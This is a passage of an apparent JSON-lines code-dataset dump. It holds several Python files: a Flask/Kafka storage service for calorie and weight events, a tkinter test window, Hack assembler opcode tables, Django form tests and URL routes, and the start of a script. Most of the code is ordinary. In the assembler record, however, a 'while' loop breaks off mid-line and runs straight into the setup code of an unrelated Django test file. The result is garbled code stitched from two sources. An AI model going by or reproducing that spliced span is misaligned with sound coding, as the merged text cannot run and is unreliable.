end_timestamp):\n\n session = DB_SESSION()\n timestamp_datetime = datetime.datetime.strptime(timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n end_timestamp = datetime.datetime.strptime(end_timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n readings = session.query(MealCalories).filter(MealCalories.date_created >= timestamp_datetime,\n MealCalories.date_created < end_timestamp)\n\n results_list = []\n\n for reading in readings:\n results_list.append(reading.to_dict())\n \n session.close()\n\n logger.info(\"Query for Meal Calories after %s returns %d results\" % (timestamp, len(results_list)))\n\n return results_list, 200\n\ndef get_user_weight(timestamp, end_timestamp):\n\n session = DB_SESSION()\n timestamp_datetime = datetime.datetime.strptime(timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n end_timestamp = datetime.datetime.strptime(end_timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n readings = session.query(UserWeight).filter(UserWeight.date_created >= timestamp_datetime,\n UserWeight.date_created < end_timestamp)\n\n results_list = []\n\n for reading in readings:\n results_list.append(reading.to_dict())\n \n session.close()\n\n logger.info(\"Query for User Weight after %s returns %d results\" % (timestamp, len(results_list)))\n\n return results_list, 200\n\ndef process_messages():\n \"\"\" Process event messages \"\"\"\n hostname = \"%s:%d\" % (app_config[\"events\"][\"hostname\"], app_config[\"events\"][\"port\"])\n retries = app_config['retries']['max']\n wait_time = app_config['retries']['sleep']\n counter = 0\n\n while counter < retries:\n logger.info(f'Trying to connect to Kafka, try number {counter}')\n try:\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config[\"events\"][\"topic\"])]\n # Create a consumer on a consumer group that only reads new messages\n # (uncommitted messages) when the service re-starts (i.e., it doesn't\n # read all the old messages from the history in the message queue).\n consumer = topic.get_simple_consumer(consumer_group=b'event_group',\n reset_offset_on_start=False,\n auto_offset_reset=OffsetType.LATEST)\n # This is blocking - it will wait for a new message\n for msg in consumer:\n msg_str = msg.value.decode('utf-8')\n msg = json.loads(msg_str)\n logger.info(\"Message: %s\" % msg)\n payload = msg[\"payload\"]\n if msg[\"type\"] == 
\"calories\": # Change this to your event type\n # Store the event1 (i.e., the payload) to the DB\n session = DB_SESSION()\n mc = MealCalories(payload['user_id'],\n payload['calorie_count'],\n payload['meal_name'],\n payload['meal_number'],\n payload['timestamp'],\n payload['trace_id'])\n session.add(mc)\n session.commit()\n session.close()\n elif msg[\"type\"] == \"weight\": # Change this to your event type\n # Store the event2 (i.e., the payload) to the DB\n # Commit the new message as being read\n session = DB_SESSION()\n uw = UserWeight(payload['user_id'],\n payload['weight_kg'],\n payload['weight_lbs'],\n payload['timestamp'],\n payload['trace_id'])\n session.add(uw)\n session.commit()\n session.close()\n consumer.commit_offsets()\n # break\n except:\n logger.error('Error while trying to connect to Kafka')\n counter += 1\n time.sleep(wait_time)\n\ndef get_health():\n return 200\n \n\n\napp = connexion.FlaskApp(__name__, specification_dir='')\napp.add_api(\"openapi.yaml\", base_path=\"/storage\", strict_validation = True, validate_responses = True)\n\nif __name__ == \"__main__\":\n t1 = Thread(target=process_messages)\n t1.setDaemon(True)\n t1.start()\n app.run(port=8090)\n","repo_name":"drinkwater0502/ACIT_3855","sub_path":"Storage/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28514845941","text":"from tkinter import *\nimport tkinter\nfrom PIL import ImageTk,Image\n\n\nws = Tk()\nws.title('English to English Dictionary')\nws.geometry('680x840')\nws.resizable(False,False)\nws.iconbitmap('images/world.ico')\ntext=\"\"\"\nhi\n\"\"\"\n\n\ndef get():\n text_box.insert(END,\"\"\"\n s\n\n\n\n\n sss\n ss\n\n sssss\n\n\n\n\n\n\n\n\n\n\n\n\n ssss\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\")\n\n \n \n \n\n\ntext_box = Text(\nws,\nheight=10,\nwidth=10,\nwrap='word',\nfg=\"black\",\n\nfont=(\"helvatica\",13)\n\n)\n\n\ntext_box.pack()\nbutton=Button(ws,text=\"submit\",command=lambda:get(),font=(\"helvatica\",10))\nbutton.pack()\n\nws.mainloop()","repo_name":"vps4618/Tkinter_Codemy","sub_path":"testing_dictionary.py","file_name":"testing_dictionary.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1573610972","text":"CompTable = {\n \"0\" :\"0101010\",\n \"1\" :\"0111111\",\n \"-1\" :\"0111010\",\n \"D\" :\"0001100\",\n \"A\" :\"0110000\",\n \"!D\" :\"0001101\",\n \"-D\" :\"0001111\",\n \"-A\" :\"0110011\",\n \"D+1\" :\"0011111\",\n \"A+1\" :\"0110111\",\n \"D-1\" :\"0001110\",\n \"A-1\" :\"0110010\",\n \"D+A\" :\"0000010\",\n \"D-A\" :\"0010011\",\n \"A-D\" :\"0000111\",\n \"D&A\" :\"0000000\",\n \"D|A\" :\"0010101\",\n \"M\" :\"1110000\",\n \"!M\" :\"1110001\",\n \"-M\" :\"1110011\",\n \"M+1\" :\"1110111\",\n \"M-1\" :\"1110010\",\n \"D+M\" :\"1000010\",\n \"D-M\" :\"1010011\",\n \"M-D\" :\"1000111\",\n \"D&M\" :\"1000000\",\n \"D|M\" :\"1010101\"\n}\n\nDestTable = {\n \"M\" :\"001\",\n \"D\" :\"010\",\n \"MD\" :\"011\",\n \"A\" :\"100\",\n \"AM\" :\"101\",\n \"AD\" :\"110\",\n \"AMD\" :\"111\"\n}\n\nJumpTable = {\n \"JGT\" :\"001\",\n \"JEQ\" :\"010\",\n \"JGE\" :\"011\",\n \"JLT\" :\"100\",\n \"JNE\" :\"101\",\n \"JLE\" :\"110\",\n \"JMP\" :\"111\"\n}\n\nSymbolTable = {\n \"SP\" :\"0\",\n \"LCL\" :\"1\",\n \"ARG\" :\"2\",\n \"THIS\" :\"3\",\n \"THAT\" :\"4\",\n \"R0\" :\"0\",\n \"R1\" 
:\"1\",\n \"R2\" :\"2\",\n \"R3\" :\"3\",\n \"R4\" :\"4\",\n \"R5\" :\"5\",\n \"R6\" :\"6\",\n \"R7\" :\"7\",\n \"R8\" :\"8\",\n \"R9\" :\"9\",\n \"R10\" :\"10\",\n \"R11\" :\"11\",\n \"R12\" :\"12\",\n \"R13\" :\"13\",\n \"R14\" :\"14\",\n \"R15\" :\"15\",\n \"SCREEN\":\"16384\",\n \"KBD\" :\"24576\"\n}\n\nvariableSymbol_Value = 16\n\ndef isWhitespace(line):\n i=0\n while(i None:\n super().setUpClass()\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание'\n )\n cls.small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x21\\xf9\\x04'\n b'\\x01\\x0a\\x00\\x01\\x00\\x2c\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02'\n b'\\x02\\x4c\\x01\\x00\\x3b'\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.guest_client = Client()\n self.user = User.objects.create_user(username=self.AUTHOR_NAME)\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n\n def test_author_create_post(self):\n \"\"\"При отправке валидной формы со страницы создания поста\n reverse('posts:post_create') создаётся новая запись в базе данных\"\"\"\n uploaded = SimpleUploadedFile(\n name='small.gif',\n content=self.small_gif,\n content_type='image/gif'\n )\n form_data = {\n 'text': 'Тестовое сообщение',\n 'group': self.group.id,\n 'image': uploaded,\n }\n response = self.authorized_client.post(\n reverse('posts:post_create'),\n data=form_data,\n follow=True\n )\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Post.objects.count(), 1)\n post = Post.objects.last()\n self.assertEqual(post.text, 'Тестовое сообщение')\n self.assertEqual(post.author, self.user)\n self.assertEqual(post.group, self.group)\n self.assertEqual(post.image, 'posts/small.gif')\n\n def test_author_edit_group_and_text_of_self_post(self):\n \"\"\"При отправке валидной формы со страницы редактирования поста\n reverse('posts:post_edit') происходит изменение поста с post_id\n в базе данных\"\"\"\n post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=self.user,\n group=self.group,\n )\n group2 = Group.objects.create(\n title='Тестовая группа 2',\n slug='test-slug-2',\n description='Тестовое описание 2'\n )\n uploaded = SimpleUploadedFile(\n name='small2.gif',\n content=self.small_gif,\n content_type='image/gif'\n )\n posts_count = Post.objects.count()\n reverse_name = reverse('posts:post_edit',\n kwargs={'post_id': post.id})\n\n response = self.authorized_client.get(reverse_name)\n\n form_data = {\n 'text': 'Обновленное сообщение',\n 'group': group2.id,\n 'image': uploaded,\n }\n\n response = self.authorized_client.post(\n reverse_name,\n data=form_data,\n follow=True,\n )\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Post.objects.count(), posts_count)\n post = Post.objects.last()\n self.assertEqual(post.text, 'Обновленное сообщение')\n self.assertEqual(post.group, group2)\n self.assertEqual(post.author, self.user)\n self.assertEqual(post.image, 'posts/small2.gif')\n self.assertFalse(Post.objects.filter(\n group=self.group, id=post.id).exists())\n\n def test_after_successfull_send_comment_on_page_of_post(self):\n \"\"\"Проверка, что после успешной отправки комментарий\n появляется на странице поста\"\"\"\n post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=self.user,\n )\n reverse_name = 
reverse('posts:add_comment',\n kwargs={'post_id': post.id})\n\n form_data = {\n 'text': 'Тестовой коментарий',\n }\n\n response = self.authorized_client.post(\n reverse_name,\n data=form_data,\n follow=True,\n )\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Comment.objects.count(), 1)\n comment = Comment.objects.last()\n self.assertEqual(comment.text, 'Тестовой коментарий')\n self.assertEqual(comment.post, post)\n self.assertEqual(comment.author, self.user)\n\n def test_only_authorized_user_can_comment_on_post(self):\n \"\"\"Проверка комментировать посты может только\n авторизованный пользователь\"\"\"\n post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=self.user,\n )\n reverse_name = reverse('posts:add_comment',\n kwargs={'post_id': post.id})\n\n response = self.authorized_client.post(\n reverse_name,\n data={'text': 'Комментарий авторизированного пользователя'},\n follow=True,\n )\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Comment.objects.count(), 1)\n\n response = self.guest_client.post(\n reverse_name,\n data={'text': 'Комментарий гостевого пользователя'},\n follow=True,\n )\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Comment.objects.count(), 1)\n","repo_name":"AndreyZyuzin/hw05_final","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13749220743","text":"from django.urls import path\n\nfrom todo.views import *\napp_name = 'todo'\n\nurlpatterns = [\n path('', TaskListView.as_view(), name='task_list'),\n path('category/', CategoryListView.as_view(), name='category_list'),\n path('task/new/', TaskCreateView.as_view(), name='task_new'),\n path('task/<int:pk>/', TaskDetailView.as_view(), name='task_detail'),\n path('category/new/', CategoryCreateView.as_view(), name='category_new'),\n path('category/<int:pk>/', CategoryDetailView.as_view(), name='category_detail'),\n]\n","repo_name":"somayejalilii/MiniProjectDjango","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34114347292","text":"import sys\n\nif len(sys.argv) < 4:\n print(\"Usage: python3 script.py input_file.txt output_file.txt -t